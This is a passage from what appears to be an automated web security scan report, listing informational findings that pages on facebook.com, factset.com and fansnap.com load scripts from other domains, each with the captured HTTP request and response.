GET /mobile/?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fmobile%2F%3Fref%3Dpf; path=/; domain=.facebook.com
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.124.65
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:29 GMT
Content-Length: 18096

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/mobile\/index.php";window._EagleEyeSeed="ynVf";</script><
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.62. http://www.facebook.com/pages/create.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /pages/create.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pages/create.php?ref_type=sitefooter HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fadvertising%2F%3Fcampaign_id%3D402047449186%26placement%3Dpflo%26extra_1%3D0

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fpages%2Fcreate.php%3Fref_type%3Dsitefooter; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.125.46
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:29 GMT
Content-Length: 32607

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/pages\/create.php";window._EagleEyeSeed="F3jP";</script><
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.63. http://www.facebook.com/plugins/activity.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/activity.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /plugins/activity.php?site=www.boston.com&width=311&height=300&header=false&colorscheme=light&font&border_color=white&ref=homepage HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://boston.com/
Cookie: datr=i0EBThVgj6dG_aF4zAL0iwRb

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.147.40
X-Cnection: close
Date: Tue, 19 Jul 2011 20:42:24 GMT
Content-Length: 8776

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/plugins\/activity.php";window._EagleEyeSeed="pbsH";</scri
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y2/r/NBp6zLvqcE_.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.64. http://www.facebook.com/plugins/likebox.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /plugins/likebox.php?channel=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2276bd5f4%26origin%3Dhttp%253A%252F%252Fwww.fastteks.com%252Ff845f085c%26relation%3Dparent.parent%26transport%3Dpostmessage&colorscheme=light&header=true&height=427&href=http%3A%2F%2Fwww.facebook.com%2Fpages%2FFast-teks-of-Central-Southern-Rhode-Island%2F115365331864877%3Fv%3Dapp_4949752878%26ref%3Dsgm&locale=en_US&sdk=joey&show_faces=false&stream=true&width=500 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.fastteks.com/TechSolutions/News.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.255.43
X-Cnection: close
Date: Tue, 19 Jul 2011 16:03:43 GMT
Content-Length: 10298

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;</script><title>Likebox | Facebook</title>
<link type="text/css" rel="styleshe
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yW/r/g6Uyl7p4qHX.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/uOvB-PjImrg.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/ya/r/fvZFkQjGc7h.js"></script>
<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y7/r/xEum5LcO_2g.js"></script>
...[SNIP]...

21.65. http://www.facebook.com/privacy/explanation.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /privacy/explanation.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /privacy/explanation.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fprivacy%2Fexplanation.php; path=/; domain=.facebook.com
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.113.53
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 28323

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/privacy\/explanation.php";window._EagleEyeSeed="O3Ue";</s
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/yo/r/FbBFWVaYbEC.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.66. http://www.facebook.com/r.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /r.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /r.php HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/plugins/like.php?&show_faces=true&action=like&font=arial&layout=standard&colorscheme=light&href=http%3A%2F%2Fwww.bing.com%3Fssd%3D20110719_0700%26ssh%3DS262080510%26FORM%3DHPFBLK%26mkt%3Den-US%26&width=400&height=80
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3Dbing.com%26placement%3Dlike_button%26extra_1%3Dhttp%253A%252F%252Fwww.bing.com%252F%26extra_2%3DUS

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.108.49
X-Cnection: close
Date: Tue, 19 Jul 2011 14:58:57 GMT
Content-Length: 30768

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/r.php";window._EagleEyeSeed="TYhN";</script><noscript> <m
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.67. http://www.facebook.com/terms.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.facebook.com
Path:   /terms.php

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /terms.php?ref=pf HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc; lsd=xZqF4; reg_fb_gate=http%3A%2F%2Fwww.facebook.com%2Fr.php; campaign_click_url=%2Fcampaign%2Flanding.php%3Fplacement%3Dpflo%26campaign_id%3D402047449186%26extra_1%3Dauto; reg_fb_ref=http%3A%2F%2Fwww.facebook.com%2Fcareers%2F%3Fref%3Dpf; __utma=87286159.39218672.1311087479.1311087479.1311087479.1; __utmb=87286159.1.10.1311087479; __utmc=87286159; __utmz=87286159.1311087479.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wd=1065x723

Response

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
P3P: CP="Facebook does not have a P3P policy. Learn why here: http://fb.me/p3p"
Pragma: no-cache
Set-Cookie: __utma=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmb=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmc=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: __utmz=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: svid=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Set-Cookie: wd=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; path=/; domain=.facebook.com; httponly
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.62.101.65
X-Cnection: close
Date: Tue, 19 Jul 2011 14:57:54 GMT
Content-Length: 44962

<!DOCTYPE html><html lang="en" id="facebook" class="no_js">
<head><meta charset="utf-8" /><script>CavalryLogger=false;window._script_path = "\/terms.php";window._EagleEyeSeed="2lBU";</script><noscript
...[SNIP]...
<link type="text/css" rel="stylesheet" href="http://static.ak.fbcdn.net/rsrc.php/v1/y6/r/hbbyfqQ4R56.css" />

<script type="text/javascript" src="http://static.ak.fbcdn.net/rsrc.php/v1/y-/r/X0wc5aPaQ9j.js"></script>
...[SNIP]...

21.68. http://www.factset.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factset.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:26:23 GMT
Content-Length: 66655
Content-Language: en
Expires: Sat, 21 Jul 2001 14:13:03 GMT
Vary: Accept-Encoding,Accept-Language
Last-Modified: Tue, 28 Jun 2011 18:55:42 GMT
X-Cache-Rules-Applied: yes
Cache-Control: max-age=0, s-maxage=1800, must-revalidate
Content-Type: text/html;charset=utf-8
X-Header-Set-Id: cache-in-proxy-30-minutes
Age: 800
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
   
           <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"

...[SNIP]...
</style>
           

                <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.69. http://www.factset.com/events  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factset.com
Path:   /events

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /events HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/products/privateequity
Cookie: __utma=70632967.167886563.1311085595.1311085595.1311085595.1; __utmb=70632967; __utmc=70632967; __utmz=70632967.1311085595.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; _ZopeId="43061235A4.KYnvGzao"; __switchTo5x=61; __unam=301c176-13142cac1d6-364e5fca-2

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:29:26 GMT
Content-Length: 76544
Content-Language: en
Expires: Sat, 21 Jul 2001 14:29:25 GMT
Vary: Accept-Encoding,Accept-Language
Last-Modified: Thu, 16 Jun 2011 15:28:57 GMT
X-Cache-Rules-Applied: yes
Cache-Control: max-age=0, s-maxage=1800, must-revalidate
Content-Type: text/html;charset=utf-8
X-Header-Set-Id: cache-in-proxy-30-minutes
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
   
           <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"

...[SNIP]...
</style>
           

                <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.70. http://www.factset.com/images/searchInputBg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factset.com
Path:   /images/searchInputBg.gif

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /images/searchInputBg.gif HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/portal_css/Plone%20Default/ploneStyles0867.css
Cookie: __utma=70632967.167886563.1311085595.1311085595.1311085595.1; __utmb=70632967; __utmc=70632967; __utmz=70632967.1311085595.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 14:26:29 GMT
Bobo-Exception-Line: 646
Content-Length: 57208
Bobo-Exception-Value: See the server error log for details
Content-Language: en
Bobo-Exception-File: HTTPResponse.py
Bobo-Exception-Type: NotFound
Vary: Accept-Encoding
X-Cache-Rules-Applied: yes
Content-Type: text/html;charset=utf-8
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
   
           <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"

...[SNIP]...
</style>
           

                <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.71. http://www.factset.com/products/im  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factset.com
Path:   /products/im

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/im HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/
Cookie: __utma=70632967.167886563.1311085595.1311085595.1311085595.1; __utmb=70632967; __utmc=70632967; __utmz=70632967.1311085595.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; _ZopeId="43061235A4.KYnvGzao"

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:26:33 GMT
Content-Length: 76057
Content-Language: en
Expires: Sat, 21 Jul 2001 14:00:36 GMT
Vary: Accept-Encoding,Accept-Language
Last-Modified: Wed, 08 Jun 2011 18:33:34 GMT
X-Cache-Rules-Applied: yes
Cache-Control: max-age=0, s-maxage=1800, must-revalidate
Content-Type: text/html;charset=utf-8
X-Header-Set-Id: cache-in-proxy-30-minutes
Age: 1557
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
   
           <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"

...[SNIP]...
</style>
           

                <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</span>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

21.72. http://www.factset.com/products/im/img/im/title_1_2.png  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factset.com
Path:   /products/im/img/im/title_1_2.png

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /products/im/img/im/title_1_2.png HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/products/im
Cookie: __utma=70632967.167886563.1311085595.1311085595.1311085595.1; __utmb=70632967; __utmc=70632967; __utmz=70632967.1311085595.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; _ZopeId="43061235A4.KYnvGzao"

Response

HTTP/1.1 404 Not Found
Date: Tue, 19 Jul 2011 14:26:36 GMT
Bobo-Exception-Line: 646
Content-Length: 61418
Bobo-Exception-Value: See the server error log for details
Content-Language: en
Bobo-Exception-File: HTTPResponse.py
Bobo-Exception-Type: NotFound
Vary: Accept-Encoding
X-Cache-Rules-Applied: yes
Content-Type: text/html;charset=utf-8
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
   
           <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"

...[SNIP]...
</style>
           

                <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...

21.73. http://www.factset.com/products/privateequity  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.factset.com
Path:   /products/privateequity

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /products/privateequity HTTP/1.1
Host: www.factset.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.factset.com/products/im
Cookie: __utma=70632967.167886563.1311085595.1311085595.1311085595.1; __utmb=70632967; __utmc=70632967; __utmz=70632967.1311085595.1.1.utmccn=(referral)|utmcsr=fakereferrerdominator.com|utmcct=/referrerPathName|utmcmd=referral; _ZopeId="43061235A4.KYnvGzao"; __switchTo5x=61; __unam=301c176-13142cac1d6-364e5fca-1

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:26:48 GMT
Content-Length: 71606
Content-Language: en
Expires: Sat, 21 Jul 2001 14:26:47 GMT
Vary: Accept-Encoding,Accept-Language
Last-Modified: Thu, 23 Jun 2011 17:38:48 GMT
X-Cache-Rules-Applied: yes
Cache-Control: max-age=0, s-maxage=1800, must-revalidate
Content-Type: text/html;charset=utf-8
X-Header-Set-Id: cache-in-proxy-30-minutes
Connection: close


           <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
   
   
           <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"

...[SNIP]...
</style>
           

                <script src="https://ssl.google-analytics.com/urchin.js" type="text/javascript">
</script>
...[SNIP]...
</span>
<script type="text/javascript" src="http://w.sharethis.com/button/buttons.js"></script>
...[SNIP]...

21.74. http://www.fansnap.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fansnap.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: www.fansnap.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:43:36 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 3.0.6
P3P: CP="IDC DSP COR CURa ADMa OUR IND ONL COM STA"
X-Runtime: 115
ETag: "d77c6a4a9298bbbbdb807bc3ffe96fee"
Cache-Control: private, max-age=0, must-revalidate
Set-Cookie: tvid=; path=/; expires=Thu, 01-Jan-1970 00:00:00 GMT
Set-Cookie: vid=1342567440282625; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:43:36 GMT
Set-Cookie: lvd=1311101016; domain=fansnap.com; path=/; expires=Mon, 19-Jul-2021 18:43:36 GMT
